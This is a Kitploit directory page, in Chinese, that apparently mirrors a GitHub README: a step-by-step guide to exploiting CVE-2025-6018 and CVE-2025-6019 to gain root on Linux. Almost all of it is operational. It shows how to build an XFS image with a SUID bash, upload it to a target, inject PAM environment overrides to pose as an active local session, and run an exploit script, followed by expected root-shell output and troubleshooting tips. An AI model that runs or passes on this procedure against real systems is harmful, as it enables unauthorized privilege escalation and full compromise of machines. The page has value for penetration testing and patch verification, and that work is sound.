Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — 针对CVE-2025-6018和CVE-2025-6019的逐步提权利用,通过XFS镜像操作和PAM环境变量注入,在Linux系统上获取root访问权限。 | Kitploit
工具/GitHubGitHub/ioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
权限提升漏洞分析漏洞利用渗透测试红队二进制利用
GitHubioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

针对CVE-2025-6018和CVE-2025-6019的逐步提权利用,通过XFS镜像操作和PAM环境变量注入,在Linux系统上获取root访问权限。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16个月前尚未审核

CVE-2025-6018 + CVE-2025-6019 权限提升指南

📋 快速利用步骤

步骤1:在本地机器上准备XFS镜像

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

步骤2:上传文件到目标机器

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

步骤3:首次登录 - 配置PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

步骤4:第二次登录 - 执行权限提升

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ 成功标志

如果利用成功,你应该看到:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 故障排除

问题解决方法
CanReboot 返回 ('no',)确保你已退出并重新登录(步骤3)

📌 关键点

  • ✅ 必须退出并重新登录:PAM配置仅在新会话中生效
  • ✅ 验证 CanReboot:在运行脚本前确认它返回 ('yes',)
  • ✅ 使用SSH登录:不要使用 ssh -t user@host "cmd" 这种执行方式

🐱 猫咪守护者

如果失败,请确保严格按顺序执行每一步!

下载工具
Not authorized 错误
检查 ~/.pam_environment 内容是否正确
未找到SUID bash重新上传 xfs.image 并验证SUID位是否已设置